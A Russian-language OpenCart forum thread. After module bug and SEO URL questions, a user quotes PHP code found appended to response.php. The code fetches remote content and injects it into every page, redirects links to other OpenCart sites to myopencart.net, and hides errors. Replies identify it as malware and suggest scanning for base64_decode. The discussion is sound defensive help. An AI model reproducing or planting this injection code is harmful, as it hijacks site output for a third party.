релиZ OpenCart

White_S написал(а):
Тоже сначала грешил на этот фрагмент кода, но этому загадочному модулю его удаление (фрагмента кода) не мешает жить и неконтролируемо размножаться. Отображение, функционал, все просто остается как и было... :)
Нажмите для раскрытия...
а ссылкой на страницу модуля на твоем сайте не поделишься?)
 
Arcvi написал(а):
а ссылкой на страницу модуля на твоем сайте не поделишься?)
Нажмите для раскрытия...
Разобрался, но косвенно ты мне помог, решил я создать демо-сайт, загрузил файлы, установил мод....и не обнаружил ошибки! понял что дело не в файлах а в бд. Переустановил модуль и все стало нормально работать. Оказалось, что для того чтобы получить такой косяк, нужно в 2-ух окнах кликнуть "установить" напротив модуля и готово:D.
 
White_S написал(а):
Разобрался, но косвенно ты мне помог, решил я создать демо-сайт, загрузил файлы, установил мод....и не обнаружил ошибки! понял что дело не в файлах а в бд. Переустановил модуль и все стало нормально работать. Оказалось, что для того чтобы получить такой косяк, нужно в 2-ух окнах кликнуть "установить" напротив модуля и готово:D.
Нажмите для раскрытия...
:dk: ничем не помог. возьмем на заметку. странно что этот момент разрабы не учли)
 
Кто-нибудь знает как возможно сделать урлы для магазина вида "сайт/магазин/категория" и "сайт/магазин/товар" сейчас я использую сеопро и имею урлы вида сайт/категория и сайт/товар. Если знаете как вообще в опенкарте осуществляется создание урлов или где об этом почитать - дайте линк, я совсем плохо это себе представляю.
 
Подскажите, нашел вот такой закодированный кусок в конце /system/library/response.php.
Что он означает?

function get_page($url){
$agent = 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; ru; rv:1.9.2.9) Gecko/20100824 Firefox/3.6.9';
$ch=curl_init();
curl_setopt ($ch, CURLOPT_URL,$url );
curl_setopt($ch, CURLOPT_USERAGENT, $agent);
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch,CURLOPT_VERBOSE,false);
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
$page=curl_exec($ch);
$httpcode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
switch($httpcode){
case '200':
return $page;
break;
case '404';
return false;
break;
}
}

if ($ftend = get_page("Для просмотра ссылки Войди или Зарегистрируйся".$_SERVER['SERVER_NAME']."&page=".$_SERVER['REQUEST_URI'])){
$find = array("
<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "Для просмотра ссылки Войди или Зарегистрируйся." : "Для просмотра ссылки Войди или Зарегистрируйся.");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script><script type="text/javascript">
var pageTracker = _gat._getTracker("UA-1013490-2");
pageTracker._setDomainName("none");
pageTracker._initData();
pageTracker._trackPageview();
</script>
</body>
", "</html>", "opencart.com", "maxzon.ru", "myopencart.ru", "opencartforum.ru", "opencart.ru", "opencart.by");
$replace = array("", $ftend, "myopencart.net", "myopencart.net", "myopencart.net", "myopencart.net", "myopencart.net", "myopencart.net");
$ouput = str_replace($find, $replace, $ouput);
ini_set("display_errors","off");
error_reporting(0);
echo $ouput;}
else {
echo $ouput;
}
 
animal_x написал(а):
Подскажите, нашел вот такой закодированный кусок в конце /system/library/response.php.
Что он означает?

function get_page($url){
$agent = 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; ru; rv:1.9.2.9) Gecko/20100824 Firefox/3.6.9';
$ch=curl_init();
curl_setopt ($ch, CURLOPT_URL,$url );
curl_setopt($ch, CURLOPT_USERAGENT, $agent);
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch,CURLOPT_VERBOSE,false);
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
$page=curl_exec($ch);
$httpcode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
switch($httpcode){
case '200':
return $page;
break;
case '404';
return false;
break;
}
}

if ($ftend = get_page("Для просмотра ссылки Войди или Зарегистрируйся".$_SERVER['SERVER_NAME']."&page=".$_SERVER['REQUEST_URI'])){
$find = array("
<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "Для просмотра ссылки Войди или Зарегистрируйся." : "Для просмотра ссылки Войди или Зарегистрируйся.");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script><script type="text/javascript">
var pageTracker = _gat._getTracker("UA-1013490-2");
pageTracker._setDomainName("none");
pageTracker._initData();
pageTracker._trackPageview();
</script>
</body>
", "</html>", "opencart.com", "maxzon.ru", "myopencart.ru", "opencartforum.ru", "opencart.ru", "opencart.by");
$replace = array("", $ftend, "myopencart.net", "myopencart.net", "myopencart.net", "myopencart.net", "myopencart.net", "myopencart.net");
$ouput = str_replace($find, $replace, $ouput);
ini_set("display_errors","off");
error_reporting(0);
echo $ouput;}
else {
echo $ouput;
}
Нажмите для раскрытия...
Ничего хорошего он не означает, это вредоносный код, замени response.php на оригинал.
 
Ок, спасибо. А куда еще могут чаще всего вставлять такой код? Те в какие файлы? Или проще просканировать все файлы на закодированные строки?
 
animal_x написал(а):
Ок, спасибо. А куда еще могут чаще всего вставлять такой код? Те в какие файлы? Или проще просканировать все файлы на закодированные строки?
Нажмите для раскрытия...
У меня к тебе встречный вопрос: а как ты можешь "просканировать на закодированные строки"? Прога специальная какая?
 
Зная по Джумле в основном пихают через base64_decode. Захожу через Тотал на фтп и запускаю поиск в php файлах на наличие base64_decode и затем проверяю код в найденных.
 
Для тех, кто не знает, как в Тотал коммандер запустить поиск, то вот горячие клавиши Alt+F7
Ну и раз нчинаете проверку всего каталога, совету проверить так же, на скрытые ссылки!
 
Войдите или зарегистрируйтесь для ответа.
Назад
Сверху